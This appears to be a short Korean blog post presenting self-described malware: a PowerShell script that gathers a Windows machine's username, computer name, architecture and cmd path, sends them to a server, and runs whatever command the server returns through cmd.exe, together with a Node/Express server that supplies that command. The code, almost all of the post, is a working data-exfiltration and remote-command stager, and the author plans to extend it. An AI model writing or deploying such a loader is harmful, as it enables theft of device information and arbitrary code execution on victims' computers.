파워쉘 기기정보 유출 악성코드

$ARC = "?arc=" + $env:PROCESSOR_ARCHITECTURE; #컴퓨터 아키텍쳐
$CN = "&cn=" + $env:COMPUTERNAME; #컴퓨터 이름
$UN = "&un=" + $env:USERNAME; #유저네임

$CMDPATH = "&path=" + $env:ComSpec; #cmd 경로

$r = [System.Net.WebRequest]::Create("http://localhost:2999/information" + $ARC + $CN + $UN + $CMDPATH);
$resp = $r.GetResponse();
$reqstream = $resp.GetResponseStream();
$sr = new-object System.IO.StreamReader $reqstream;
$result = $sr.ReadToEnd();
#write-host $result;

cmd.exe /c $result; #서버에서 전송한 특정 악성 명령어 실행

파워쉘에서 환경변수 명령어를 통해 사용자 이름, 컴퓨터 이름, 컴퓨터 아키텍쳐 등을 탈취하여 Node로 구현된 서버로 보낸다. 

 

const express = require("express");
const app = express();

app.use(express.json());

app.get("/information", (req,res ) => {
    console.log(req.query);

    const command = "ping 127.0.0.1";

    res.send(command);
})

app.listen(2999, function() {
    console.log("server on port 2999");
});

서버에서는 cmd로 실행할 수 있는 특정 인수를 response한다.

 

 

다양한 기능을 추가해볼 생각이다.